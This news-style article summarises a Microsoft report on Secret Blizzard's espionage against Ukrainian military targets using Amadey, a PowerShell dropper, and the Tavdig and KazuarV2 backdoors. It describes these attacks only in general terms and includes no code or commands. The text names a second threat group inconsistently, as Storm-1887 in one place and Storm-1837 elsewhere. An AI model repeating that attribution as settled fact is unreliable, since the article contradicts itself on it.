Microsoft has reported on a sophisticated cyber operation attributed to the group known as Secret Blizzard, which has utilized the Amadey malware to execute targeted attacks against specific entities. The nature of the attacks suggests that Secret Blizzard either employed Amadey as a malware-as-a-service or engaged with its command-and-control panels clandestinely to deploy a PowerShell dropper onto victim devices. This dropper was found to contain a Base64-encoded payload linked to Amadey, alongside code designed to establish communication with Secret Blizzard’s own C2 infrastructure.
The primary aim of this operation was to deploy Tavdig, a backdoor tool that enables Secret Blizzard to conduct thorough reconnaissance on its selected targets. The Amadey variant detected by Microsoft was programmed to extract sensitive data such as clipboard contents and passwords stored in web browsers. Following this data collection, Secret Blizzard would deploy a specialized reconnaissance tool targeted at particular devices, notably those associated with STARLINK IP addresses, which are frequently identified as being linked to military operations in Ukraine.
In cases where Secret Blizzard identified high-value targets, the group would proceed to install Tavdig for detailed data gathering. Information collected included user profiles, network statistics, installed software patches, and registry settings on compromised devices. This method of intelligence gathering underscores a strategic focus on entities of significant interest, particularly within military contexts.
Moreover, this year, Microsoft investigators observed Secret Blizzard incorporating tools from a separate threat group known as Storm-1887 to further its espionage efforts against Ukrainian military personnel. In an incident documented in January 2024, a military device in Ukraine was breached through a backdoor related to Storm-1837, which was configured to utilize the Telegram API for launching PowerShell commands. These commands were likely intended to establish unauthorized remote access to accounts on the Mega file-sharing platform, facilitating the download of commands or files executable on the infiltrated device.
As noted, the PowerShell dropper employed in this instance exhibited similarities to the one used in conjunction with Amadey, resulting in deployable elements that included the previously mentioned Tavdig payload along with a Symantec binary. In doing so, Secret Blizzard not only sought initial access through the deployment of malicious tools but also implemented persistence mechanisms to maintain access through the KazuarV2 backdoor.
While concrete evidence of the Storm-1837 backdoor actively downloading the Tavdig loader was not directly observed, the temporal correlation suggests a strong likelihood that it was employed as part of a coordinated effort by Secret Blizzard to execute the attack. This indicates a layered approach to intrusions, leveraging multiple threat vectors to enhance the sophistication and efficacy of their operations.
This recent disclosure by Microsoft follows earlier reports of Secret Blizzard’s collaboration with tools from the Pakistan-based threat group Storm-0156, with efforts focused on gathering intelligence in South Asia. Microsoft’s continuous monitoring has revealed that over the past seven years, Secret Blizzard has capitalized on the infrastructures and methodologies of at least six different threat groups, illustrating the group’s adaptive nature and emphasis on strategic intelligence gathering.
Considering the tactics and techniques employed, it is clear that Secret Blizzard has engaged in various stages of the MITRE ATT&CK framework. Initial access via malware deployment, persistence through backdoor installation, and reconnaissance activities represent critical phases of their operational strategy. As organizations confront these evolving threats, understanding these attack patterns becomes essential for developing robust cybersecurity defenses.
